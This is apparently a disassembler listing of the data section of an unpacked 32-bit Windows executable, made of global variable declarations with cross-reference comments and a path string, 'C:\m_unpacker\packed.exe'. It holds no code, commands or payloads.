dword_4CBA34 dd 77E6C0E3h ; DATA XREF: sub_409909+8C�w
; sub_409909+E2�r ...
dword_4CBA38 dd 71AB1ED3h ; DATA XREF: sub_409909+610�w
; sub_409909+764�r ...
dword_4CBA3C dd 71B2A381h ; DATA XREF: sub_409909+B43�w
; sub_409909+B5F�r
dword_4CBA40 dd 77DDA595h ; DATA XREF: sub_409909+33A�w
; sub_419B9E+55�r
dword_4CBA44 dd 77DD22EAh ; DATA XREF: sub_409909+27E�w
; sub_409909+2D3�r ...
dword_4CBA48 dd 773F97B0h ; DATA XREF: sub_409909+BAA�w
dword_4CBA4C dd 76D67A29h ; DATA XREF: sub_409909+AEC�w
; sub_40A928+CE�r
dword_4CBA50 dd 76D674FAh ; DATA XREF: sub_409909+ADF�w
; sub_409909+AE6�r ...
dword_4CBA54 dd 71AB3C22h ; DATA XREF: sub_4017ED+A6�r
; sub_401ACD+5052�r ...
dword_4CBA58 dd 71AB2BBFh ; DATA XREF: sub_401ACD+5044�r
; sub_401ACD+77D6�r ...
dword_4CBA5C dd 1F7BA3A9h ; DATA XREF: sub_409909+BF4�w
; sub_409909+C2F�r
dword_4CBA60 dd 71AB401Ch ; DATA XREF: sub_401ACD+1DF4�r
; sub_401ACD+5A1F�r ...
dword_4CBA64 dd 71C214BAh ; DATA XREF: sub_409909+9B1�w
; sub_409909+A2B�r ...
dword_4CBA68 dd 71AB868Dh ; DATA XREF: sub_409909+65E�w
; sub_409909+794�r ...
dword_4CBA6C dd 71AB1A6Dh ; DATA XREF: sub_40111D+12�r
; sub_4017ED+D0�r ...
dword_4CBA70 dd 71AB155Ah ; DATA XREF: sub_409909+59B�w
; sub_409909+70C�r ...
dword_4CBA74 dd 71B22C25h ; DATA XREF: sub_409909+B36�w
; sub_409909+B57�r ...
dword_4CBA78 dd 71AB5A01h ; DATA XREF: sub_409909+540�w
; sub_409909+6C4�r ...
dword_4CBA7C dd 71B2ACCBh ; DATA XREF: sub_409909+B29�w
; sub_409909+B4A�r
dword_4CBA80 dd 77E78C17h ; DATA XREF: sub_401221+52�r
; sub_409909+31�w ...
dword_4CBA84 dd 77D49A11h ; DATA XREF: sub_409909+17F�w
; sub_409909+1CA�r
dd 0
dword_4CBA8C dd 76D62A37h ; DATA XREF: sub_409909+927�w
; sub_409909+93B�r ...
dword_4CBA90 dd 77E6CBF9h ; DATA XREF: sub_409909+99�w
; sub_409909+EA�r ...
dword_4CBA94 dd 0 ; DATA XREF: sub_409909:loc_409A07�w
; sub_409909+12B�w ...
dword_4CBA98 dd 0 ; DATA XREF: sub_409909+126�w
; sub_40A5C5+1C�r
dword_4CBA9C dd 0 ; DATA XREF: sub_409909:loc_409AF7�w
; sub_409909:loc_409B5E�w ...
dword_4CBAA0 dd 0 ; DATA XREF: sub_409909+250�w
; sub_40A5C5+50�r
dword_4CBAA4 dd 0 ; DATA XREF: sub_401221+349�r
; sub_401ACD+4468�r ...
dword_4CBAA8 dd 0 ; DATA XREF: sub_409909+41E�w
; sub_40A5C5+84�r
dword_4CBAAC dd 0 ; DATA XREF: sub_409909:loc_409E0D�w
; sub_40A5C5:loc_40A675�r
dword_4CBAB0 dd 0 ; DATA XREF: sub_409909+4FF�w
; sub_40A5C5+B8�r
dword_4CBAB4 dd 0 ; DATA XREF: sub_409909:loc_40A0DE�w
; sub_40A5C5:loc_40A6A9�r
dword_4CBAB8 dd 0 ; DATA XREF: sub_409909+7D0�w
; sub_40A5C5+EC�r
dword_4CBABC dd 0 ; DATA XREF: sub_409909:loc_40A1C9�w
; sub_409909+8EF�w ...
dword_4CBAC0 dd 0 ; DATA XREF: sub_409909+8EA�w
; sub_40A5C5+120�r
dword_4CBAC4 dd 0 ; DATA XREF: sub_401ACD:loc_406E35�r
; sub_409909:loc_40A25D�w ...
dword_4CBAC8 dd 0 ; DATA XREF: sub_409909+94F�w
; sub_40A5C5+154�r
dword_4CBACC dd 0 ; DATA XREF: sub_401ACD+4470�r
; sub_409909:loc_40A379�w ...
dword_4CBAD0 dd 0 ; DATA XREF: sub_409909+A6B�w
; sub_40A5C5+188�r
dword_4CBAD4 dd 0 ; DATA XREF: sub_409909:loc_40A3C3�w
; sub_40A5C5:loc_40A779�r
dword_4CBAD8 dd 0 ; DATA XREF: sub_409909+AB5�w
; sub_40A5C5+1BC�r
dword_4CBADC dd 0 ; DATA XREF: sub_409909:loc_40A40D�w
; sub_40A5C5:loc_40A7AD�r
dword_4CBAE0 dd 0 ; DATA XREF: sub_409909+AFF�w
; sub_40A5C5+1F0�r
dword_4CBAE4 dd 0 ; DATA XREF: sub_409909:loc_40A481�w
; sub_40A5C5:loc_40A7E1�r
dword_4CBAE8 dd 0 ; DATA XREF: sub_409909+B73�w
; sub_40A5C5+224�r
dword_4CBAEC dd 0 ; DATA XREF: sub_409909:loc_40A4CB�w
; sub_40A5C5:loc_40A815�r
dword_4CBAF0 dd 0 ; DATA XREF: sub_409909+BBD�w
; sub_40A5C5+258�r
dword_4CBAF4 dd 0 ; DATA XREF: sub_409909:loc_40A569�w
; sub_40A5C5:loc_40A849�r
dword_4CBAF8 dd 0 ; DATA XREF: sub_409909+C5B�w
; sub_40A5C5+28C�r
dword_4CBAFC dd 0 ; DATA XREF: sub_409909:loc_40A5B3�w
; sub_40A5C5:loc_40A87D�r
dword_4CBB00 dd 0 ; DATA XREF: sub_409909+CA5�w
; sub_40A5C5+2C0�r
dword_4CBB04 dd 5 dup(0) ; DATA XREF: sub_40AA06+32�o
byte_4CBB18 db 0 ; DATA XREF: sub_40B2B3+6A�r
; sub_40B2B3+98�w
align 10h
dword_4CBB20 dd 0 ; DATA XREF: sub_40BD1A+18�r
; sub_40C2AF+92�w ...
dword_4CBB24 dd 0 ; DATA XREF: sub_40C3E8+4D�r
; sub_40C600+D9�w ...
dd 7FEh dup(0)
dword_4CDB20 dd 6 dup(0) ; DATA XREF: sub_40C3E8+D2�o
; sub_40C3E8+13B�o ...
dword_4CDB38 dd 0 ; DATA XREF: sub_40BD91+2C4�w
; sub_40BD91+348�o
dword_4CDB3C dd 0 ; DATA XREF: sub_40BD91+33E�w
; sub_40BD91+35A�r
dword_4CDB40 dd 0 ; DATA XREF: sub_40BD91+2CF�w
dword_4CDB44 dd 0 ; DATA XREF: sub_40BD91+2B9�w
; sub_40BD91:loc_40C0A6�r
dword_4CDB48 dd 20h dup(0) ; DATA XREF: sub_40BD91+2E2�o
; sub_40BD91+302�o
dword_4CDBC8 dd 0 ; DATA XREF: sub_40BD91+2D5�w
dword_4CDBCC dd 0 ; DATA XREF: sub_40BD91+2EF�w
; sub_40BD91+30F�w
dword_4CDBD0 dd 0 ; DATA XREF: sub_40BD91:loc_40C101�r
align 8
dword_4CDBD8 dd 0 ; DATA XREF: sub_40BD91+82�w
; sub_40BD91+101�o
dword_4CDBDC dd 41h dup(0) ; DATA XREF: sub_40BD91+41�o
dword_4CDCE0 dd 41h dup(0) ; DATA XREF: sub_40BD91+69�o
dword_4CDDE4 dd 0 ; DATA XREF: sub_40BD91+F7�w
; sub_40BD91+113�r
dword_4CDDE8 dd 0 ; DATA XREF: sub_40BD91+52�w
dword_4CDDEC dd 0 ; DATA XREF: sub_40BD91+4D�w
; sub_40BD91+D4�r
dword_4CDDF0 dd 20h dup(0) ; DATA XREF: sub_40BD91+9A�o
; sub_40BD91+BA�o
dword_4CDE70 dd 0 ; DATA XREF: sub_40BD91+8F�w
dword_4CDE74 dd 0 ; DATA XREF: sub_40BD91+A7�w
; sub_40BD91+C7�w
dword_4CDE78 dd 0 ; DATA XREF: sub_40BD91:loc_40BEBA�r
align 10h
dword_4CDE80 dd 0 ; DATA XREF: sub_40BD91+1A5�w
; sub_40BD91+225�o
dword_4CDE84 dd 41h dup(0) ; DATA XREF: sub_40BD91+167�o
dword_4CDF88 dd 41h dup(0) ; DATA XREF: sub_40BD91+18C�o
dword_4CE08C dd 0 ; DATA XREF: sub_40BD91+21B�w
; sub_40BD91+237�r
dword_4CE090 dd 0 ; DATA XREF: sub_40BD91+17A�w
dword_4CE094 dd 0 ; DATA XREF: sub_40BD91+175�w
; sub_40BD91+1F8�r
dword_4CE098 dd 20h dup(0) ; DATA XREF: sub_40BD91+1BE�o
; sub_40BD91+1DE�o
dword_4CE118 dd 0 ; DATA XREF: sub_40BD91+1B1�w
dword_4CE11C dd 0 ; DATA XREF: sub_40BD91+1CB�w
; sub_40BD91+1EB�w
dword_4CE120 dd 0 ; DATA XREF: sub_40BD91:loc_40BFDE�r
align 8
dword_4CE128 dd 0 ; DATA XREF: sub_40BD91+417�w
; sub_40BD91+470�o
dword_4CE12C dd 0A2h dup(0) ; DATA XREF: sub_40BD91+405�o
dword_4CE3B4 dd 41h dup(0) ; DATA XREF: sub_40BD91+3CF�o
dword_4CE4B8 dd 0 ; DATA XREF: sub_40BD91+3FC�w
; sub_40BD91+423�r
align 10h
dword_4CE4C0 dd 0 ; DATA XREF: sub_40BD91+466�w
; sub_40BD91+482�r
dword_4CE4C4 dd 0 ; DATA XREF: sub_40BD91+429�w
dword_4CE4C8 dd 0 ; DATA XREF: sub_40BD91+436�w
dword_4CE4CC dd 0 ; DATA XREF: sub_40BD91+3F6�w
dd 0
dword_4CE4D4 dd 0 ; DATA XREF: sub_40BD91:loc_40C229�r
dd 0
dword_4CE4DC dd 0 ; DATA XREF: sub_40B9DD+E�r
; sub_40B9DD+32�r ...
dword_4CE4E0 dd 0 ; DATA XREF: sub_40B9DD+9�r
; sub_40B9DD+26�r ...
dword_4CE4E4 dd 82h dup(0) ; DATA XREF: sub_40C85F+8D�o
dword_4CE6EC dd 2 dup(0) ; DATA XREF: sub_40D1C8+68�o
dword_4CE6F4 dd 0 ; DATA XREF: sub_40DB5E+9E�o
dword_4CE6F8 dd 0 ; DATA XREF: sub_40EED1+1F�r
; sub_40EF1C+BC�o ...
dword_4CE6FC dd 0 ; DATA XREF: sub_40EF1C+B7�o
; sub_40EF1C+DA�r ...
dword_4CE700 dd 0 ; DATA XREF: sub_40EF1C+9A�o
; sub_40EF1C+CF�r ...
dword_4CE704 dd 0 ; DATA XREF: sub_40EE8E+35�r
; sub_40EF1C+95�o ...
dword_4CE708 dd 0 ; DATA XREF: sub_40EE8E+17�r
; sub_40EED1+3D�r ...
align 10h
dword_4CE710 dd 0A114h ; DATA XREF: sub_40BD91+2AE�r
; sub_40F0F1+10�w ...
align 8
dword_4CE718 dd 0 ; DATA XREF: sub_40BA49+1C�r
; sub_40F108+27C�w
dword_4CE71C dd 0 ; DATA XREF: sub_40F9BF+2A�w
; sub_40F9BF+51�r ...
dd 3 dup(0)
dword_4CE72C dd 0 ; DATA XREF: sub_4111C0+146�r
dd 0
dword_4CE734 dd 0 ; DATA XREF: sub_412EDD+4�w
; sub_412EDD+9�o
align 10h
byte_4CE740 db 0 ; DATA XREF: sub_413A29+1D3�w
; sub_413A29+2D2�o
align 2
word_4CE742 dw 0 ; DATA XREF: sub_413A29+1E3�w
word_4CE744 dw 0 ; DATA XREF: sub_413A29+1E9�w
word_4CE746 dw 0 ; DATA XREF: sub_413A29+1F0�w
byte_4CE748 db 0 ; DATA XREF: sub_413A29+1F7�w
byte_4CE749 db 0 ; DATA XREF: sub_413A29+1FE�w
word_4CE74A dw 0 ; DATA XREF: sub_413A29+204�w
dword_4CE74C dd 0 ; DATA XREF: sub_413A29+234�w
; sub_413A29+250�w
dword_4CE750 dd 0 ; DATA XREF: sub_413A29+258�w
byte_4CE754 db 0 ; DATA XREF: sub_413A29+26A�w
byte_4CE755 db 0 ; DATA XREF: sub_413A29+27D�w
word_4CE756 dw 0 ; DATA XREF: sub_413A29+295�w
word_4CE758 dw 0 ; DATA XREF: sub_413A29+2A4�w
word_4CE75A dw 0 ; DATA XREF: sub_413A29+29C�w
dword_4CE75C dd 101h dup(0) ; DATA XREF: sub_413A29+2B9�o
dword_4CEB60 dd 80h dup(0) ; DATA XREF: sub_401ACD+2F25�o
; sub_401ACD:loc_404A7B�o ...
byte_4CED60 db 0 ; DATA XREF: sub_4152D1+1A1�w
; sub_4152D1+27A�o
align 2
word_4CED62 dw 0 ; DATA XREF: sub_4152D1+1AE�w
word_4CED64 dw 0 ; DATA XREF: sub_4152D1+1B8�w
word_4CED66 dw 0 ; DATA XREF: sub_4152D1+1C1�w
byte_4CED68 db 0 ; DATA XREF: sub_4152D1+1C8�w
byte_4CED69 db 0 ; DATA XREF: sub_4152D1+1CF�w
word_4CED6A dw 0 ; DATA XREF: sub_4152D1+1D6�w
dword_4CED6C dd 0 ; DATA XREF: sub_4152D1+1E3�w
dword_4CED70 dd 0 ; DATA XREF: sub_4152D1+1EB�w
word_4CED74 dw 0 ; DATA XREF: sub_4152D1+244�w
word_4CED76 dw 0 ; DATA XREF: sub_4152D1+22C�w
word_4CED78 dw 0 ; DATA XREF: sub_4152D1+256�w
word_4CED7A dw 0 ; DATA XREF: sub_4152D1+1F7�w
dword_4CED7C dd 101h dup(0) ; DATA XREF: sub_4152D1+265�o
dword_4CF180 dd 0 ; DATA XREF: sub_401ACD+19C3�w
; sub_401ACD+2F1D�r ...
align 10h
byte_4CF190 db 0 ; DATA XREF: sub_4157BA+241�o
; sub_4157BA+250�w ...
byte_4CF191 db 0 ; DATA XREF: sub_4157BA+264�w
word_4CF192 dw 0 ; DATA XREF: sub_4157BA+295�w
word_4CF194 dw 0 ; DATA XREF: sub_4157BA+27C�w
; sub_4157BA:loc_415B8C�w
word_4CF196 dw 0 ; DATA XREF: sub_4157BA+29B�w
byte_4CF198 db 0 ; DATA XREF: sub_4157BA+288�w
byte_4CF199 db 0 ; DATA XREF: sub_4157BA+25D�w
word_4CF19A dw 0 ; DATA XREF: sub_4157BA+3F2�w
; sub_4157BA+41C�w
dword_4CF19C dd 0 ; DATA XREF: sub_4157BA:loc_415A83�w
; sub_4157BA+39A�r
dword_4CF1A0 dd 0 ; DATA XREF: sub_4157BA+2D6�w
word_4CF1A4 dw 0 ; DATA XREF: sub_4157BA+394�w
; sub_4157BA+3E8�o
word_4CF1A6 dw 0 ; DATA XREF: sub_4157BA+335�w
; sub_4157BA+35A�r ...
dword_4CF1A8 dd 0 ; DATA XREF: sub_4157BA+30C�w
; sub_4157BA+3D9�w
dword_4CF1AC dd 0 ; DATA XREF: sub_4157BA+328�w
; sub_4157BA+3AB�w ...
byte_4CF1B0 db 0 ; DATA XREF: sub_4157BA+311�r
; sub_4157BA+31F�w
byte_4CF1B1 db 0 ; DATA XREF: sub_4157BA+2DB�w
; sub_4157BA+3A4�w ...
word_4CF1B2 dw 0 ; DATA XREF: sub_4157BA+2E9�w
word_4CF1B4 dw 0 ; DATA XREF: sub_4157BA+3F9�w
; sub_4157BA+42A�w
word_4CF1B6 dw 0 ; DATA XREF: sub_4157BA+32E�w
word_4CF1B8 dw 0 ; DATA XREF: sub_4157BA+360�w
; sub_4157BA+432�o
word_4CF1BA dw 0 ; DATA XREF: sub_4157BA+36F�w
; sub_4157BA+409�w
dword_4CF1BC dd 0 ; DATA XREF: sub_4157BA+369�w
dd 2 dup(0)
dword_4CF1C8 dd 0 ; DATA XREF: sub_4157BA+39F�w
; sub_4157BA+417�o
dword_4CF1CC dd 0 ; DATA XREF: sub_4157BA+33B�w
byte_4CF1D0 db 0 ; DATA XREF: sub_4157BA+341�w
byte_4CF1D1 db 0 ; DATA XREF: sub_4157BA+347�w
word_4CF1D2 dw 0 ; DATA XREF: sub_4157BA+354�w
dword_4CF1D4 dd 7 dup(0) ; DATA XREF: sub_4157BA+3ED�o
dword_4CF1F0 dd 0 ; DATA XREF: sub_4157BA+30�w
; sub_4157BA+43B�r
dword_4CF1F4 dd 100h dup(0) ; DATA XREF: sub_4157BA+1C3�o
; sub_4157BA+47E�o
dword_4CF5F4 dd 1000h dup(0) ; DATA XREF: sub_415D38+1D�o
; sub_415DD8�o ...
dword_4D35F4 dd 0 ; DATA XREF: sub_415D38+13�o
; sub_415DD8+E�o ...
dword_4D35F8 dd 0Eh dup(0) ; DATA XREF: sub_416CC9+F�o
dword_4D3630 dd 80h dup(0) ; DATA XREF: sub_417990+41�o
dword_4D3830 dd 200h dup(0) ; DATA XREF: sub_4172C1+C7�o
; sub_41761C+DD�o ...
dword_4D4030 dd 48h dup(0) ; DATA XREF: sub_4172C1+D6�o
; sub_41761C+F4�o ...
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: .data:off_4383A8�o
dd 1B7h dup(0)
dword_4D4830 dd 0 ; DATA XREF: sub_4172C1+86�w
; sub_417493+94�r
dword_4D4834 dd 0 ; DATA XREF: sub_4172C1+A7�w
; sub_4178F9+55�r ...
dword_4D4838 dd 0 ; DATA XREF: sub_4172C1+A0�w
; sub_417493+D6�r ...
dword_4D483C dd 0 ; DATA XREF: sub_4172C1+79�w
; sub_417493+35�r ...
dword_4D4840 dd 80h dup(0) ; DATA XREF: sub_4178F9+5E�o
dword_4D4A40 dd 0 ; DATA XREF: sub_4172C1+93�w
; sub_417493+A2�r
align 8
dword_4D4A48 dd 0 ; DATA XREF: sub_4172C1+E7�o
; sub_4172C1+103�r ...
dword_4D4A4C dd 0 ; DATA XREF: sub_41761C+17B�w
; sub_4177C3+107�w
dword_4D4A50 dd 0 ; DATA XREF: sub_41761C+180�w
; sub_4177C3+10D�w ...
dword_4D4A54 dd 0 ; DATA XREF: sub_41761C+159�w
; sub_4178F9+4F�r
dword_4D4A58 dd 0 ; DATA XREF: sub_417C61+22�w
; sub_417C61:loc_417DE6�w ...
dword_4D4A5C dd 0 ; DATA XREF: sub_401ACD+3C95�o
; sub_417B2F+12�o ...
dd 0
dword_4D4A64 dd 0 ; DATA XREF: sub_417C61+1C�r
; sub_417E06+3A�r
dd 7Fh dup(0)
dword_4D4C64 dd 0 ; DATA XREF: sub_417C61+28�r
; sub_417E06+4A�w
dd 1944h dup(0)
dword_4DB178 dd 0 ; DATA XREF: sub_417E06+23�o
dword_4DB17C dd 81h dup(0) ; DATA XREF: sub_401ACD+3CB9�o
; sub_417B2F+3C�o ...
dword_4DB380 dd 17h dup(0) ; DATA XREF: sub_418D2A:loc_418E47�o
; sub_418D2A+131�o ...
dword_4DB3DC dd 80h dup(0) ; DATA XREF: sub_419AE0+7C�o
; sub_419AE0+A5�o
dword_4DB5DC dd 0 ; DATA XREF: sub_4190A5+45�w
; sub_4190A5+4D�r ...
dword_4DB5E0 dd 17h dup(0) ; DATA XREF: sub_4199AC:loc_419ACE�o
; sub_4199AC+12D�o
dword_4DB63C dd 80h dup(0) ; DATA XREF: sub_418FE5+4C�o
; sub_418FE5+7E�o ...
byte_4DB83C db 0 ; DATA XREF: sub_4190A5+29�r
; sub_4190A5+34�w
align 10h
dword_4DB840 dd 80h dup(0) ; DATA XREF: sub_4192FC+61�o
; sub_4192FC+89�o ...
dword_4DBA40 dd 81h dup(0) ; DATA XREF: sub_418C0E:loc_418C46�o
; sub_418C0E+5B�o
dword_4DBC44 dd 0 ; DATA XREF: sub_419F6D:loc_419F8E�r
; sub_41A05C+54�r ...
dword_4DBC48 dd 0 ; DATA XREF: sub_419F6D�r
; sub_41A05C+37�r ...
dword_4DBC4C dd 0 ; DATA XREF: sub_419F9D+1A�r
; sub_41A1B1+83�o
dword_4DBC50 dd 0 ; DATA XREF: sub_419F6D:loc_419F81�r
; sub_41A1B1+11B�w
dword_4DBC54 dd 0Dh dup(0) ; DATA XREF: sub_41A05C+13�o
; sub_41A1B1:loc_41A2EE�o
dword_4DBC88 dd 0 ; DATA XREF: sub_41A05C+CD�r
; sub_41A05C+EC�r ...
align 10h
dword_4DBC90 dd 0Fh dup(0) ; DATA XREF: sub_41ADD8+47�o
byte_4DBCCC db 0 ; DATA XREF: sub_41B52C+6�o
; .text:0041B881�o ...
align 10h
dd 3Fh dup(0)
dword_4DBDCC dd 2 dup(0) ; DATA XREF: sub_41B55B+18�o
dword_4DBDD4 dd 2 dup(0) ; DATA XREF: sub_41B55B+8�o
; .text:0041B6CA�o
dword_4DBDDC dd 0 ; DATA XREF: sub_41C59D+1B9�w
; sub_41DA8B:loc_41DB07�w ...
dword_4DBDE0 dd 0 ; DATA XREF: sub_41DC5E+35�w
; sub_41E312:loc_41E3AC�w ...
dword_4DBDE4 dd 0 ; DATA XREF: sub_42423B+13A�r
dword_4DBDE8 dd 0A28h ; DATA XREF: .text:0041E225�w
dword_4DBDEC dd 501h ; DATA XREF: .text:0041E21C�w
dword_4DBDF0 dd 5 ; DATA XREF: .text:0041E211�w
dword_4DBDF4 dd 1 ; DATA XREF: .text:0041E203�w
dword_4DBDF8 dd 1 ; DATA XREF: sub_401221:loc_401516�r
; sub_42378C+91�w
dword_4DBDFC dd 350B20h ; DATA XREF: sub_401221+2FE�r
; sub_401221+31E�r ...
dd 0
dword_4DBE04 dd 350B48h ; DATA XREF: sub_4236D3+44�w
dd 3 dup(0)
off_4DBE14 dd offset aCM_unpackerPac ; DATA XREF: sub_42378C+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4DBE1C db 0 ; DATA XREF: sub_41C1B3+2D�w
; sub_4241E3+5�r
align 10h
dword_4DBE20 dd 0 ; DATA XREF: sub_41C1B3+27�w
dword_4DBE24 dd 0 ; DATA XREF: sub_41C1B3+4�r
; sub_41C1B3+8B�w
dword_4DBE28 dd 0 ; DATA XREF: sub_41CAD4+3B�r
; sub_41CAD4+91�w
align 10h
dword_4DBE30 dd 0 ; DATA XREF: sub_41D124+A�w
dword_4DBE34 dd 0 ; DATA XREF: .text:0041E257�w
; sub_4236D3:loc_4236E5�r ...
dd 0
dword_4DBE3C dd 0 ; DATA XREF: sub_41E2C9�r sub_41E2EE�r ...
dword_4DBE40 dd 0 ; DATA XREF: sub_41F3B0+4B�w
; sub_41F4C9+2D�w ...
dword_4DBE44 dd 0 ; DATA XREF: sub_41FBB2�r
dword_4DBE48 dd 0 ; DATA XREF: sub_41BBE2:loc_41BCFE�r
; sub_41BBE2:loc_41BE1F�r ...
dword_4DBE4C dd 1 ; DATA XREF: sub_420749:loc_4208C4�r
; sub_4208E2+4�w ...
dword_4DBE50 dd 0 ; DATA XREF: sub_420CE6+37�r
align 8
dword_4DBE58 dd 0 ; DATA XREF: sub_422279+11�r
; sub_42237D+1A�r ...
byte_4DBE5C db 0 ; DATA XREF: sub_422279+3�r
; sub_422279+98�r ...
align 10h
dword_4DBE60 dd 0 ; DATA XREF: sub_42237D+11�r
; sub_42245B+21�w ...
byte_4DBE64 db 0 ; DATA XREF: sub_42245B+51�w
align 4
dword_4DBE68 dd 0 ; DATA XREF: sub_422651+4E�r
; sub_422A2C+3A�r ...
dword_4DBE6C dd 0 ; DATA XREF: sub_422651+5C�r
; sub_422A2C+43�r ...
dword_4DBE70 dd 0 ; DATA XREF: sub_41D3AA+7A�r
; sub_4227F8+5�r
dword_4DBE74 dd 0 ; DATA XREF: sub_422DFC+29�r
dword_4DBE78 dd 1 ; DATA XREF: sub_4232A8+28�r
; sub_4232A8+4C�w ...
dd 2 dup(0)
dword_4DBE84 dd 0 ; DATA XREF: sub_41DE4A+4�r
; sub_41DE4A+6E�r ...
dd 3 dup(0)
dword_4DBE94 dd 0 ; DATA XREF: sub_41E0D4+61�r
; sub_41E0D4+BF�r ...
dd 0
dword_4DBE9C dd 0 ; DATA XREF: sub_4234F7+3A�r
; sub_4234F7+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_42378C:loc_4237A3�o
; .data:off_4DBE14�o
align 4
dd 3Ah dup(0)
dword_4DBFA4 dd 1 ; DATA XREF: sub_4239D9+2�r
; sub_4239D9+23�w ...
dword_4DBFA8 dd 0 ; DATA XREF: sub_423D98+21�r
dword_4DBFAC dd 0 ; DATA XREF: sub_41FBCD+154�w
; sub_420CE6:loc_420D0F�w ...
dword_4DBFB0 dd 0 ; DATA XREF: sub_41FBCD+7�r
dword_4DBFB4 dd 1 ; DATA XREF: sub_4244F4+26�r
; sub_4244F4:loc_42455E�w
word_4DBFB8 dw 0 ; DATA XREF: sub_424DF9+1A�o
; sub_424DF9+46�r
byte_4DBFBA db 0 ; DATA XREF: sub_424DF9+39�r
align 4
dword_4DBFBC dd 7 dup(0) ; DATA XREF: sub_424DF9+52�o
dword_4DBFD8 dd 0 ; DATA XREF: sub_424DF9+40�w
; sub_424DF9+5C�o
dword_4DBFDC dd 0 ; DATA XREF: sub_424DF9+4D�w
dword_4DBFE0 dd 0 ; DATA XREF: sub_424DF9+31�w
dword_4DBFE4 dd 0 ; DATA XREF: sub_424DF9+52�w
dword_4DBFE8 dd 77C26E79h ; DATA XREF: sub_424F1C:loc_424F3F�r
; sub_424F1C+38�r ...
dword_4DBFEC dd 0 ; DATA XREF: sub_425029+3�r
; sub_425029+2E�w ...
dword_4DBFF0 dd 0 ; DATA XREF: sub_425029+43�w
; sub_425029:loc_425078�r
dword_4DBFF4 dd 0 ; DATA XREF: sub_425029+4A�w
; sub_425029+60�r
dword_4DBFF8 dd 0 ; DATA XREF: sub_42423B+3F�r
dword_4DBFFC dd 0 ; DATA XREF: sub_425C06:loc_425C6D�r
; sub_425C06+6D�o
dword_4DC000 dd 0 ; DATA XREF: sub_425C06:loc_425C44�r
; sub_425C06+44�o
dword_4DC004 dd 0 ; DATA XREF: sub_425C06:loc_425C37�r
; sub_425C06+37�o
dword_4DC008 dd 0 ; DATA XREF: sub_425C06:loc_425C51�r
; sub_425C06+51�o
align 10h
dword_4DC010 dd 0 ; DATA XREF: sub_426636+28�r
; sub_426636+4C�w ...
dword_4DC014 dd 0 ; DATA XREF: sub_4268C1+26�r
; sub_4268C1:loc_42692B�w
byte_4DC018 db 1 ; DATA XREF: sub_40DB3C�r sub_40DB3C+9�w
align 4
dword_4DC01C dd 351110h ; DATA XREF: sub_41E490:loc_41E4A1�r
; sub_41FD3D+14�r ...
dword_4DC020 dd 400h dup(0) ; DATA XREF: .data:off_43D568�o
; .data:0043D570�o
dword_4DD020 dd 200h ; DATA XREF: sub_41E490+9�r
; sub_41E490+56�r ...
dd 7 dup(0)
dword_4DD040 dd 350650h ; DATA XREF: sub_41F8E3+75�r
; sub_41F9BC+2A�r ...
dword_4DD044 dd 3Fh dup(0) ; DATA XREF: sub_423B0B+92�o
dword_4DD140 dd 20h ; DATA XREF: sub_41E312+8�r
; sub_41F9BC+C�r ...
dword_4DD144 dd 4E4h ; DATA XREF: sub_420749+14�r
; sub_420749+65�w ...
align 10h
dword_4DD150 dd 3 dup(0) ; DATA XREF: sub_420749+123�o
; sub_420749+171�o ...
dword_4DD15C dd 0 ; DATA XREF: sub_420749+108�w
; sub_420749+15D�w ...
byte_4DD160 db 0 ; DATA XREF: sub_420988:loc_420A94�w
; sub_420988:loc_420AB1�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4DD260 db 0 ; DATA XREF: sub_420749+5C�o
; sub_420749+AF�o ...
byte_4DD261 db 0 ; DATA XREF: sub_41C3B1+5D�r
; sub_420749+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4DD364 dd 0 ; DATA XREF: sub_420749+6E�w
; sub_420749+12B�w ...
dword_4DD368 dd 0 ; DATA XREF: sub_41E6CF+3C�w
; sub_41ED74+5�r ...
dword_4DD36C dd 0 ; DATA XREF: sub_41E742+23A�r
; sub_41E742+25A�r ...
dword_4DD370 dd 0 ; DATA XREF: sub_41E6CF+31�w
; sub_41E742+311�w ...
dword_4DD374 dd 0 ; DATA XREF: sub_41E6CF+21�w
; sub_41E742+22D�r ...
dword_4DD378 dd 0 ; DATA XREF: sub_41E6CF+28�w
; sub_41E717�r ...
dword_4DD37C dd 0 ; DATA XREF: sub_41E6CF+15�w
; sub_41E717+8�r ...
dword_4DD380 dd 0 ; DATA XREF: sub_41BBE2+5C�r
; sub_41BEF3+F�r ...
dword_4DD384 dd 350000h ; DATA XREF: sub_41BA91+5A�r
; sub_41BBE2+C0�r ...
dword_4DD388 dd 1 ; DATA XREF: sub_41BA91+C�r
; sub_41BBE2:loc_41BC12�r ...
dword_4DD38C dd 142340h ; DATA XREF: .text:0041E24D�w
; sub_42367B+F�r ...
dword_4DD390 dd 1 ; DATA XREF: sub_4236D3+AD�w
dword_4DD394 dd 1 ; DATA XREF: sub_420B0D�r
; sub_420B0D+11�w ...
dword_4DD398 dd 35075Ch ; DATA XREF: sub_41C1B3+3E�r
; sub_41D9B3+13�r ...
dword_4DD39C dd 350758h ; DATA XREF: sub_41C1B3+35�r
; sub_41C1B3+57�r ...
_data ends
; Section 4. (virtual address 000DE000)
; Virtual size : 00006200 ( 25088.)
